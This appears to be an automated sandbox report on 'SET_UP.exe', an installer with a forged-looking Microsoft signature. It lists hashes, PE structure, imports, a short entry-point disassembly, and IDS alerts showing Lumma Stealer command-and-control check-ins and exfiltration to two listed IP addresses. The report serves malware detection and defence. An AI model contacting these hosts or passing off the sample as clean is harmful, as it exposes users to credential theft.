                                                                                                                                          Entropy (8bit):6.681879780616523
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:v2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6W:vRSf0Ww+NpPSyzYY8c8YEPI4+W
                                                                                                                                          MD5:9A438A75E68E88CDABC13074A17F8A52
                                                                                                                                          SHA1:97C94801D37D249ECE7BA9ACA05703303FD9CF06
                                                                                                                                          SHA-256:CCCCADDE7393F1B624CDE32B38274E60BBE65B1769D614D129BABDAEEF9A6715
                                                                                                                                          SHA-512:19D260505972B96C2E5AE0058A29F61E606E276779A80732DBEE70F9223DBFF51DCB1F5E4EFF19206C300EE08E6060987171F5B83AD87FDD8F797E0E2DB529FC
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):0.3854610057830319
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                          • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                          • Inno Setup installer (109748/4) 1.07%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          File name:SET_UP.exe
                                                                                                                                          File size:74'139'832 bytes
                                                                                                                                          MD5:117c82db1bc3c31c9196bd4a949f3358
                                                                                                                                          SHA1:5ca11fd4cff68324465dc3ea5a4d2c7e5bd2dd4d
                                                                                                                                          SHA256:f155b4c6f26be1e233572d98655e2b997209142a3c01cdc25c389f14f7ff50b3
                                                                                                                                          SHA512:36476e4e827556e9b6356c539c0d6cd8a0118fd74a13ae615bf65b496bfabfeb94230294ebd8adcd775c7c54ffe1e3668737827567c8b086cda11a91111fde3c
                                                                                                                                          SSDEEP:24576:qtdAm9DUV/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5v991RB1en+Tx9i3w+UthDluhP:CqTBtRFk6ek1v991R6ngd+Ute8DMl
                                                                                                                                          TLSH:5DF7391262A1CC32D7321BB5CBD685CC5BA9FD2C1B6194CB3EB45A7C493BAC06934E53
                                                                                                                                          Icon Hash:2763431123673f27
                                                                                                                                          Entrypoint:0x50156c
                                                                                                                                          Entrypoint Section:.itext
                                                                                                                                          Digitally signed:true
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                                                          Signature Valid:false
                                                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                          Error Number:-2146869232
                                                                                                                                          Not Before, Not After
                                                                                                                                          • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                                          Subject Chain
                                                                                                                                          • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                          Version:3
                                                                                                                                          Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                          Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                          Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                          Serial:33000003DFFB6AE3F427ECB6A30000000003DF
                                                                                                                                          Instruction
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          add esp, FFFFFFF0h
                                                                                                                                          push ebx
                                                                                                                                          push esi
                                                                                                                                          push edi
                                                                                                                                          mov eax, 004FEBF4h
                                                                                                                                          call 00007F19251BD2F2h
                                                                                                                                          push FFFFFFECh
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov ebx, dword ptr [eax+00000170h]
                                                                                                                                          push ebx
                                                                                                                                          call 00007F19251BE19Dh
                                                                                                                                          and eax, FFFFFF7Fh
                                                                                                                                          push eax
                                                                                                                                          push FFFFFFECh
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          push ebx
                                                                                                                                          call 00007F19251BE3F2h
                                                                                                                                          xor eax, eax
                                                                                                                                          push ebp
                                                                                                                                          push 005015E7h
                                                                                                                                          push dword ptr fs:[eax]
                                                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                                                          push 00000001h
                                                                                                                                          call 00007F19251BDB3Dh
                                                                                                                                          call 00007F19252B2C9Ch
                                                                                                                                          mov eax, dword ptr [004FE82Ch]
                                                                                                                                          push eax
                                                                                                                                          push 004FE890h
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          call 00007F1925230731h
                                                                                                                                          call 00007F19252B2CF0h
                                                                                                                                          xor eax, eax
                                                                                                                                          pop edx
                                                                                                                                          pop ecx
                                                                                                                                          pop ecx
                                                                                                                                          mov dword ptr fs:[eax], edx
                                                                                                                                          jmp 00007F19252B593Bh
                                                                                                                                          jmp 00007F19251B8A19h
                                                                                                                                          call 00007F19252B2A6Ch
                                                                                                                                          mov eax, 00000001h
                                                                                                                                          call 00007F19251B94DAh
                                                                                                                                          call 00007F19251B8E5Dh
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov edx, 0050177Ch
                                                                                                                                          call 00007F192523023Ch
                                                                                                                                          push 00000005h
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov eax, dword ptr [eax+00000170h]
                                                                                                                                          push eax
                                                                                                                                          call 00007F19251BE3B3h
                                                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov edx, dword ptr [004D9740h]

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10d000 | 0x3840 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x113000 | 0xc4400 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x46b26e8 | 0x21d0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x112000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x10da80 | 0x88c | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xfe084 | 0xfe200 | f64aa552cc32219198e7178b7b1d3bd2 | False | 0.48196457667240533 | data | 6.478677918483919 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .itext | 0x100000 | 0x1788 | 0x1800 | 030d751d7e20e11f863bdb27a950c708 | False | 0.5203450520833334 | data | 5.94899155660316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x102000 | 0x3068 | 0x3200 | 2f90c6f68c18651f5b580d5ad2b852e9 | False | 0.421796875 | data | 4.334644118113417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .bss | 0x106000 | 0x6194 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x10d000 | 0x3840 | 0x3a00 | e31e730fc86b9dac8932bd3f92752751 | False | 0.31041217672413796 | data | 5.202469592139362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x111000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0x112000 | 0x18 | 0x200 | d6264f4705ad03600aa29f24c89eb799 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.20544562813451883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x113000 | 0xc4400 | 0xc4400 | eb4e98f3f35a5eaa0f900a41e20a3b25 | False | 0.4319466560509554 | data | 6.708002800239729 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x113cd4 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x113e08 | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0x113f3c | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x114070 | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0x1141a4 | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0x1142d8 | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0x11440c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_BITMAP | 0x114540 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465 |
| RT_BITMAP | 0x114a28 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931 |
| RT_ICON | 0x114b10 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.18098130011539484 |
| RT_ICON | 0x156b38 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.4074293150360819 |
| RT_ICON | 0x167360 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.5627657061880019 |
| RT_ICON | 0x16b588 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6340248962655601 |
| RT_ICON | 0x16db30 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.7647748592870544 |
| RT_ICON | 0x16ebd8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.8438524590163935 |
| RT_ICON | 0x16f560 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8404255319148937 |
| RT_STRING | 0x16f9c8 | 0xec | data | | | 0.6059322033898306 |
| RT_STRING | 0x16fab4 | 0x250 | data | | | 0.47466216216216217 |
| RT_STRING | 0x16fd04 | 0x28c | data | | | 0.4647239263803681 |
| RT_STRING | 0x16ff90 | 0x3e4 | data | | | 0.4347389558232932 |
| RT_STRING | 0x170374 | 0x9c | data | | | 0.717948717948718 |
| RT_STRING | 0x170410 | 0xe8 | data | | | 0.6293103448275862 |
| RT_STRING | 0x1704f8 | 0x468 | data | | | 0.3820921985815603 |
| RT_STRING | 0x170960 | 0x38c | data | | | 0.3898678414096916 |
| RT_STRING | 0x170cec | 0x3dc | data | | | 0.39271255060728744 |
| RT_STRING | 0x1710c8 | 0x360 | data | | | 0.37037037037037035 |
| RT_STRING | 0x171428 | 0x40c | data | | | 0.3783783783783784 |
| RT_STRING | 0x171834 | 0x108 | data | | | 0.5113636363636364 |
| RT_STRING | 0x17193c | 0xcc | data | | | 0.6029411764705882 |
| RT_STRING | 0x171a08 | 0x234 | data | | | 0.5070921985815603 |
| RT_STRING | 0x171c3c | 0x3c8 | data | | | 0.3181818181818182 |
| RT_STRING | 0x172004 | 0x32c | data | | | 0.43349753694581283 |
| RT_STRING | 0x172330 | 0x2a0 | data | | | 0.41964285714285715 |
| RT_RCDATA | 0x1725d0 | 0x82e8 | data | English | United States | 0.11261637622344235 |
| RT_RCDATA | 0x17a8b8 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x17a8c8 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333 |
| RT_RCDATA | 0x17c0c8 | 0x6b0 | data | | | 0.6466121495327103 |
| RT_RCDATA | 0x17c778 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947 |
| RT_RCDATA | 0x182288 | 0x125 | Delphi compiled form 'TMainForm' | | | 0.7508532423208191 |
| RT_RCDATA | 0x1823b0 | 0x3a2 | Delphi compiled form 'TNewDiskForm' | | | 0.524731182795699 |
| RT_RCDATA | 0x182754 | 0x320 | Delphi compiled form 'TSelectFolderForm' | | | 0.53625 |
| RT_RCDATA | 0x182a74 | 0x300 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5703125 |
| RT_RCDATA | 0x182d74 | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | | | 0.4562458249832999 |
| RT_RCDATA | 0x183350 | 0x461 | Delphi compiled form 'TUninstSharedFileForm' | | | 0.4335414808206958 |
| RT_RCDATA | 0x1837b4 | 0x2092 | Delphi compiled form 'TWizardForm' | | | 0.2299112497001679 |
| RT_GROUP_CURSOR | 0x185848 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x18585c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x185870 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x185884 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x185898 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1858ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1858c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0x1858d4 | 0x68 | data | English | United States | 0.7403846153846154 |
| RT_VERSION | 0x18593c | 0x15c | data | English | United States | 0.5689655172413793 |
| RT_MANIFEST | 0x185a98 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924 |
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
ole32.dll | CoDisconnectObject
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SysFreeString
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-25T22:17:12.751979+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:13.528341+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:13.528341+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:14.752659+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:15.500846+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:15.500846+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:16.911417+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:17.904222+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49732 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:19.240090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:21.583075+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:24.187670+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:26.263533+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:28.331819+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:29.105041+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49743 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:31.032314+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 172.67.214.186 | 443 | TCP
2024-12-25T22:17:31.931874+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 172.67.214.186 | 443 | 192.168.2.4 | 49744 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                          Dec 25, 2024 22:17:19.241713047 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:19.241913080 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:19.243125916 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:19.243125916 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:19.243156910 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:20.102796078 CET44349733104.21.89.250192.168.2.4
